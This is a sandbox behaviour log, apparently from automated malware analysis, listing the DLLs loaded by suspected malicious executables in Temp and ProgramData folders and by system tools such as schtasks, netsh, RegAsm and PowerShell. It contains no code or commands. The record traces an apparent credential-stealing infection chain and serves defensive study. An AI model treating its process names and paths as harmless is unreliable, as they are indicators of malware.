Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe Section loaded: wtsapi32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe Section loaded: winsta.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe Section loaded: windows.fileexplorer.common.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe Section loaded: explorerframe.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Section loaded: rstrtmgr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Section loaded: d3d11.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Section loaded: dxgi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Section loaded: resourcepolicyclient.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Section loaded: d3d10warp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Section loaded: dxcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Section loaded: devobj.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Section loaded: webio.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Section loaded: vaultcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: xmllite.dll
Source: C:\Users\user\1000021002\ac861238af.exe Section loaded: wsock32.dll
Source: C:\Users\user\1000021002\ac861238af.exe Section loaded: version.dll
Source: C:\Users\user\1000021002\ac861238af.exe Section loaded: winmm.dll
Source: C:\Users\user\1000021002\ac861238af.exe Section loaded: mpr.dll
Source: C:\Users\user\1000021002\ac861238af.exe Section loaded: wininet.dll
Source: C:\Users\user\1000021002\ac861238af.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\1000021002\ac861238af.exe Section loaded: userenv.dll
Source: C:\Users\user\1000021002\ac861238af.exe Section loaded: uxtheme.dll
Source: C:\Users\user\1000021002\ac861238af.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\1000021002\ac861238af.exe Section loaded: windows.storage.dll
Source: C:\Users\user\1000021002\ac861238af.exe Section loaded: wldp.dll
Source: C:\Users\user\1000021002\ac861238af.exe Section loaded: propsys.dll
Source: C:\Users\user\1000021002\ac861238af.exe Section loaded: profapi.dll
Source: C:\Users\user\1000021002\ac861238af.exe Section loaded: edputil.dll
Source: C:\Users\user\1000021002\ac861238af.exe Section loaded: urlmon.dll
Source: C:\Users\user\1000021002\ac861238af.exe Section loaded: iertutil.dll
Source: C:\Users\user\1000021002\ac861238af.exe Section loaded: srvcli.dll
Source: C:\Users\user\1000021002\ac861238af.exe Section loaded: netutils.dll
Source: C:\Users\user\1000021002\ac861238af.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\1000021002\ac861238af.exe Section loaded: sspicli.dll
Source: C:\Users\user\1000021002\ac861238af.exe Section loaded: wintypes.dll
Source: C:\Users\user\1000021002\ac861238af.exe Section loaded: appresolver.dll
Source: C:\Users\user\1000021002\ac861238af.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\1000021002\ac861238af.exe Section loaded: slc.dll
Source: C:\Users\user\1000021002\ac861238af.exe Section loaded: sppc.dll
Source: C:\Users\user\1000021002\ac861238af.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\1000021002\ac861238af.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\1000021002\ac861238af.exe Section loaded: pcacli.dll
Source: C:\Users\user\1000021002\ac861238af.exe Section loaded: sfc_os.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: xmllite.dll
Source: C:\Windows\System32\netsh.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\netsh.exe Section loaded: ifmon.dll
Source: C:\Windows\System32\netsh.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: mprapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: rasmontr.dll
Source: C:\Windows\System32\netsh.exe Section loaded: rasapi32.dll
Source: C:\Windows\System32\netsh.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\netsh.exe Section loaded: rasman.dll
Source: C:\Windows\System32\netsh.exe Section loaded: mfc42u.dll
Source: C:\Windows\System32\netsh.exe Section loaded: rasman.dll
Source: C:\Windows\System32\netsh.exe Section loaded: authfwcfg.dll
Source: C:\Windows\System32\netsh.exe Section loaded: fwpolicyiomgr.dll
Source: C:\Windows\System32\netsh.exe Section loaded: firewallapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: fwbase.dll
Source: C:\Windows\System32\netsh.exe Section loaded: dhcpcmonitor.dll
Source: C:\Windows\System32\netsh.exe Section loaded: dot3cfg.dll
Source: C:\Windows\System32\netsh.exe Section loaded: dot3api.dll
Source: C:\Windows\System32\netsh.exe Section loaded: onex.dll
Source: C:\Windows\System32\netsh.exe Section loaded: eappcfg.dll
Source: C:\Windows\System32\netsh.exe Section loaded: ncrypt.dll
Source: C:\Windows\System32\netsh.exe Section loaded: eappprxy.dll
Source: C:\Windows\System32\netsh.exe Section loaded: ntasn1.dll
Source: C:\Windows\System32\netsh.exe Section loaded: fwcfg.dll
Source: C:\Windows\System32\netsh.exe Section loaded: hnetmon.dll
Source: C:\Windows\System32\netsh.exe Section loaded: netshell.dll
Source: C:\Windows\System32\netsh.exe Section loaded: nlaapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: netsetupapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: netiohlp.dll
Source: C:\Windows\System32\netsh.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\netsh.exe Section loaded: winnsi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: nettrace.dll
Source: C:\Windows\System32\netsh.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\netsh.exe Section loaded: nshhttp.dll
Source: C:\Windows\System32\netsh.exe Section loaded: httpapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: nshipsec.dll
Source: C:\Windows\System32\netsh.exe Section loaded: userenv.dll
Source: C:\Windows\System32\netsh.exe Section loaded: activeds.dll
Source: C:\Windows\System32\netsh.exe Section loaded: polstore.dll
Source: C:\Windows\System32\netsh.exe Section loaded: winipsec.dll
Source: C:\Windows\System32\netsh.exe Section loaded: adsldpc.dll
Source: C:\Windows\System32\netsh.exe Section loaded: adsldpc.dll
Source: C:\Windows\System32\netsh.exe Section loaded: nshwfp.dll
Source: C:\Windows\System32\netsh.exe Section loaded: cabinet.dll
Source: C:\Windows\System32\netsh.exe Section loaded: p2pnetsh.dll
Source: C:\Windows\System32\netsh.exe Section loaded: p2p.dll
Source: C:\Windows\System32\netsh.exe Section loaded: profapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\netsh.exe Section loaded: rpcnsh.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wcnnetsh.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wlanapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: whhelper.dll
Source: C:\Windows\System32\netsh.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wlancfg.dll
Source: C:\Windows\System32\netsh.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wshelper.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wevtapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: mswsock.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wwancfg.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wwapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wcmapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: rmclient.dll
Source: C:\Windows\System32\netsh.exe Section loaded: mobilenetworking.dll
Source: C:\Windows\System32\netsh.exe Section loaded: peerdistsh.dll
Source: C:\Windows\System32\netsh.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\netsh.exe Section loaded: slc.dll
Source: C:\Windows\System32\netsh.exe Section loaded: sppc.dll
Source: C:\Windows\System32\netsh.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: ktmw32.dll
Source: C:\Windows\System32\netsh.exe Section loaded: mprmsg.dll
Source: C:\Windows\System32\netsh.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wldp.dll
Source: C:\Windows\System32\netsh.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1000066001\swiiiii.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\1000066001\swiiiii.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1000066001\swiiiii.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000066001\swiiiii.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1000066001\swiiiii.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1000066001\swiiiii.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1000066001\swiiiii.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1000066001\swiiiii.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1000066001\swiiiii.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1000066001\swiiiii.exe Section loaded: cryptbase.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: apphelp.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: winmm.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: rstrtmgr.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: ncrypt.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: ntasn1.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: d3d11.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: dxgi.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: resourcepolicyclient.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: kernel.appcore.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: d3d10warp.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: uxtheme.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: dxcore.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: sspicli.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: winhttp.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: wininet.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: mswsock.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: devobj.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: webio.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: iphlpapi.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: winnsi.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: dnsapi.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: rasadhlp.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: fwpuclnt.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: schannel.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: mskeyprotect.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: ncryptsslp.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: msasn1.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: cryptsp.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: rsaenh.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: cryptbase.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: gpapi.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: vaultcli.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: wintypes.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: windows.storage.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: wldp.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: ntmarta.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: dpapi.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: winmm.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: rstrtmgr.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: ncrypt.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: ntasn1.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: d3d11.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: dxgi.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: resourcepolicyclient.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: kernel.appcore.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: d3d10warp.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: uxtheme.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: dxcore.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: sspicli.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: winhttp.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: wininet.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: mswsock.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: devobj.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: webio.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: iphlpapi.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: winnsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: apphelp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: aclayers.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: mpr.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sfc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sfc_os.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: winhttp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: webio.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: mswsock.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: iphlpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: winnsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: dnsapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: rasadhlp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: schannel.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: mskeyprotect.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ntasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ncrypt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ncryptsslp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: msasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: gpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: dpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: wbemcomn.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: amsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: userenv.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: profapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: wbemcomn.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: uxtheme.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
